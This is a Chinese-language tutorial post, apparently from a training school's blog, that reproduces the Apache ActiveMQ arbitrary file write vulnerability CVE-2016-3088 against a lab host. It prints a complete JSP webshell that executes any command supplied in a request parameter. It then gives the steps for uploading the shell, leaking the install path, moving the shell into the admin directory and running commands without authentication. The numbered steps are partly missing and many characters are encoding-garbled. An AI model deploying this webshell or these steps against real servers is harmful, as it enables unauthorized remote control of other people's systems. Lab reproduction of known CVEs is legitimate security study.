2019-08-07 15:25:27 4735瀏覽
今天千鋒扣丁學堂Linux培訓老師給大家分享一篇關(guān)于介紹了Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復(fù)現(xiàn)的詳細介紹,下面我們一起來看一下吧。
3、啟動,進入bin目錄下,運行./activemqstart
4、瀏覽器訪問http://192.168.10.149:8161/,如下圖可以看到成功搭建環(huán)境
<%@ page import="java.io.*"%> <% out.print("Hello</br>"); String strcmd=request.getParameter("cmd"); String line=null; Process p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream())); while((line=br.readLine())!=null){ out.print(line+"</br>"); } %>
2、瀏覽器訪問http://192.168.10.149:8161/fileserver/1.jsp,下圖可以看到fileserver目錄下的webshell沒有被解析,說明fileserver目錄沒有執(zhí)行權(quán)限
3、利用該版本存在物理路徑泄露漏洞,爆一下絕對路徑
4、利用Move方法將webshell移入admin目錄下,如下圖所示成功把文件移入到admin目錄
5、利用該版本存在的未授權(quán)訪問漏洞,不用登錄,訪問http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下圖可以看到成功執(zhí)行命令
【關(guān)注微信公眾號獲取更多學習資料】 【掃碼進入Python全棧開發(fā)免費公開課】